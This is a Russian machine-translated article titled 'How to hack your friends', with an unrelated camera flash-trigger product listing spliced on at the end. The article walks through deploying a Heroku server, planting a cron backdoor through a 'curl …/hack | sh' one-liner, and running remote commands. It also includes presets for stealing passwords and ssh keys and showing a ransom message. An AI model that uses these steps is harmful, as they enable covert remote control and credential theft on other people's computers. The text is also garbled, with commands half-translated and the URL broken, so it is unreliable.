Как взломать друзей. Мои друзья часто оставляют свои компьютеры… | Чета Коркоса | Мы переехали на freeCodeCamp.org/news
Мои друзья часто оставляют свои компьютеры открытыми и разблокированными. Я говорю им, что им, вероятно, стоит взять за привычку запирать свои компьютеры, но они меня не слушают. Поэтому я создал простой проект, чтобы взломать своих друзей и показать им важность компьютерной безопасности.
Все, что мне нужно сделать, это подождать, пока они оставят свой компьютер разблокированным на несколько секунд, открыть свой терминал и ввести одну короткую команду.
Вот оно! Теперь их компьютер заражен, и я могу удаленно запускать любые команды на этом компьютере. Довольно мило, правда? Или, может быть, шокирует?
Взлом запрещен. В частности:
«преднамеренный доступ к компьютеру без авторизации или превышение разрешенного доступа» — Закон о компьютерном мошенничестве и злоупотреблениях (18 U.S.C. 1030)
Итак, имейте в виду, что цель этой статьи — показать вам, как легко кто-то с плохими намерениями может взломать вас, чтобы вы могли избежать взлома себя.
Чтобы разрушить вашу жизнь, не нужно быть гениальным хакером — любой «детский скриптер», который может получить физический доступ к вашему компьютеру, может скомпрометировать вас, загрузив скрипт, содержащий всего 50 строк кода.
Весь код этого проекта находится в этом репозитории, если вы хотите сразу перейти к нему, но ниже я объясню, как все это работает.
Во-первых, вам просто нужно клонировать репозиторий, установить его зависимости и создать символическую ссылку на инструмент интерфейса командной строки (CLI) hack .
git clone https://github.com/ccorcos/hack.git
git remote remove origin
cd hack
npm install
npm link
Затем вам нужно настроить Heroku для размещения скриптов, которые будут работать на вашем машина друзей. Если вы никогда раньше не использовали Heroku, зарегистрируйтесь здесь (это бесплатно!) И настройте их инструмент командной строки на своем компьютере.
brew install heroku-toolbelt
heroku login
Теперь внутри репозитория hack создайте приложение Heroku с легко запоминающимся именем.
я использую хакер-чет.
heroku create hacker-chet
Затем вам нужно запустить команду для небольшой настройки. Все, что он на самом деле делает, это получает корневой URL-адрес вашего веб-сайта Heroku и помещает его в ваш package.json . Таким образом, сервер может внедрить URL-адрес приложения в сценарии оболочки.
npm run init
Вы можете запустить сервер локально, если хотите взломать себя и протестировать.
npm start
Или вы можете развернуть на Heroku.
npm run deploy
Теперь вы готовы к взлому!
Прелесть этой программы в том, что для того, чтобы начать взламывать кого-то, вам достаточно выполнить одну команду на его машине.
curl/hack | sh
ROOT_URL — это конкретный путь к вашему приложению. Когда вы запускаете сервер локально, это будет localhost:5000 , а при развертывании в Heroku это будет что-то вроде 
com
Это настраивает задание cron — «хронологическое задание», которое повторно запускает задачи в определенное время — для проверки связи с конечной точкой /env/live каждую минуту и передачи результата на sh . Это на самом деле очень просто! И Heroku дает вам HTTPS бесплатно, так что это «безопасно», верно?
После того, как вы взломали своего друга, вы можете делать все остальное с помощью инструмента командной строки со своего компьютера.
Инструмент hack имеет концепцию различных взломанных сред. Когда вы взламываете кого-то с помощью /hack , этот человек начинает работу в среде live . И для каждой среды вы можете запускать множество различных команд. Я продемонстрирую все с небольшим прохождением.
Следующее переписывает сценарий оболочки live для выполнения следующей команды, которая произносит вслух «Я слежу за тобой».
hack live exec "скажи "Я смотрю на тебя""
Ну, это пока не сработает, вам все равно придется повторно развернуть приложение Heroku.
hack deploy
Теперь подождите следующую минуту и наблюдайте, как компьютер вашего друга пингует ваш сервер, следя за журналами сервера.
журналы взлома
Весь смысл окружения в том, что вы можете взломать нескольких людей одновременно. Чтобы изолировать людей в разных средах, вам просто нужно изменить имя.
hack live rename jon
В следующий раз, когда будет пинговаться живая среда, он перепишет задание cron, чтобы вместо этого начать пинговать среду jon .
Вы можете сделать все то же самое, просто изменив аргумент среды.
hack jon exec "say 'hello jon'"
Теперь, если вы достаточно повеселились за день и вечеринка закончилась, вы можете забыть Джона и заверить его, что вы его «разблокировали».
hack jon забудьте
Это удалит задание cron с их компьютера. Или вы можете просто перевести эту среду в режим спящей ячейки, чтобы вы могли восстановить ее позже.
хак джон интервал 1д
Теперь вместо того, чтобы пинговать ваш сервер каждую минуту (по умолчанию), он будет пинговать его каждый день в полночь.
А когда вы захотите разбудить его снова, вы можете изменить интервал обратно на каждую минуту, и на следующий день все готово!
hack jon interval 1m
Есть и другие забавные вещи, которые можно сделать, это настроить дополнительные задания cron. Вот как вы можете будить своего друга в 6 утра каждое утро, чтобы напомнить ему о компьютерной безопасности.
hack jon cron "0 6 * * * say 'доброе утро, джон, помнишь, что я говорил тебе о блокировке компьютера?'"
P.S. Если вы не помните, как работают задания cron, это отличный ресурс. Практически все сводится к этой маленькой диаграмме.
* * * * *
| | | | |
| | | | |
| | | | +---- День недели (диапазон: 1-7, 1 означает понедельник)
| | | +------ Месяц года (диапазон: 1-12)
| | +-------- День месяца (диапазон: 1-31)
| +---------- Часы (диапазон: 0-23)
+------------- Минуты (диапазон: 0-59)
Одна из моих любимых рабочий стол предустановка, которая загрузит изображение с заданного URL-адреса и установит его в качестве фоновой фотографии.
Hack Jon Preset Desktop http://i.imgur.com/5FC2r9R.jpg
И если вы написали кучу заданий cron и больше не знаете, что там находится, вы можете использовать команду dump.
hack jon dump "crontab -l"
Теперь откройте свои журналы, и вы увидите результат при следующем пинге. Это на самом деле гораздо более зловещее теперь, когда вы можете получить информацию обратно. Если вы хотите быть более гнусным, вы можете найти расшифрованные пароли или украсть их ssh-ключи.
взломать заданные пароли Джона
взломать заданные пароли Джона ssh
Но если вы просто хотите напугать его старым добрым способом, отправьте ему сообщение с требованием выкупа!
hack jon предустановленный выкуп «Здравствуйте, Джон, я же говорил вам не оставлять ваш компьютер разблокированным».
Наконец, если вы обнаружите, что добавляете кучу заданий cron и просто хотите начать все сначала, вам поможет сброс.
hack jon reset
Теперь идите (ответственно) развлекайтесь с этой штукой и дайте мне знать, какие ваши любимые розыгрыши, отправив запрос на вытягивание с новой командой или пресетом!
Удачного взлома!
Приемник Voking VK-WF850 2.
4G Wireless 1/8000s HSS E-TTL Flash Trigger для Canon VK-WF850C | Фотохак- Обзор
Печать Отправить другу по электронной почте
Беспроводной трансивер VK-WF850C для Canon поддерживает высокоскоростную синхронизацию 1/8000, компенсацию экспозиции TTL, вспышку с ручным переключением M. Также поддерживает высокоскоростное синхронное студийное освещение и внешнее освещение, передатчик управляет несколькими приемниками и работает вспомогательная вспышка.
Особенности/характеристики
- Частота: 2,4 ГГц
- Расстояние: до 100 м
- 4 канала и 3 группы (A, B, C)
- Батарейки: 2x AA (передатчик и приемник) — не входят в комплект
- Максимальная скорость синхронизации: 1/8000 с
- Выход: Поддержка ПК и триггера горячего башмака
- Вход: порт USB (передатчик и приемник)
- Входное напряжение: 2,4–3,2 В
- Размеры: 80 x 67 x 60 мм (передатчик) 80 x 67 x 60 мм (приемник)
- Встроенная антенна на печатной плате
- Вес: передатчик — 86 г, приемник — 80 г
Совместимость с большинством высокоскоростных синхронизируемых вспышек Nikon и вспышек TTL — компенсация экспозиции TTL и ручная вспышка M-скорости — 3 группы вспышек для вывода различных режимов и мощности вспышки — синхронизация по передней шторке, синхронизация по задней шторке, синхронизация по низкой скорости , высокоскоростная синхронизация — передатчик, управляющий несколькими приемниками — вспомогательная лампа АФ со вспышкой — высокоскоростная синхронная студийная вспышка и уличная вспышка — настройка режима масштабирования вспышки на камере.
